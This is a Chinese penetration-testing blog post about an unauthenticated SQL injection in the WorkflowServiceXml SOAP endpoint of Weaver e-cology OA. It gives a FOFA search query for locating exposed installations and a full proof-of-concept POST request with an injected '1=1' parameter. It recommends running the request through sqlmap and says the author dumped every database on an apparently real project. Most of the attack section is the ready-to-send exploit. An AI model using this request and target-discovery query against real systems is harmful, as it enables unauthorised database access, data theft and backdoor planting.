泛微ecology系统 WorkflowServiceXml 接口处存在SQL注入漏洞
泛微ecology系统 WorkflowServiceXml 接口处存在SQL注入漏洞
原创 V1xk 渗透小记 2024-07-30 20:44
欢迎来到
渗透小记公众号****
“
免责声明:
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。”
建议把 渗透小记
公众号设置为
星标
,这样能更快看到新的文章推送哦!
一、漏洞描述
泛微e-cology依托全新的设计理念,全新的管理思想。为中大型组织创建全新的高效协同办公环境。智能语音办公,简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化。该系统中 WorkflowServiceXml 接口处存在SQL注入漏洞,未经授权的远程攻击者可以利用该漏洞执行任意SQL语句从而对数据库进行任意操作,包括植入后门木马等。****
二、空间测绘引擎
fofa语法:
app="泛微-协同办公OA"
三、漏洞复现
部分页面:
POC:
POST /services/WorkflowServiceXml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>
此次记录涉及隐私,故上厚码。
出现如上返回包可判断疑似出现SQL注入,直接扔进sqlmap里面跑就好,下面是跑出来的记录文件
继续深入,爆出来所有数据库。今天先这样,此次项目涉及隐私,不方便放太多图,见谅。
写文章的目的在于记录与分享,如果喜欢的话可以点个关注哦,不定期会更新精彩内容!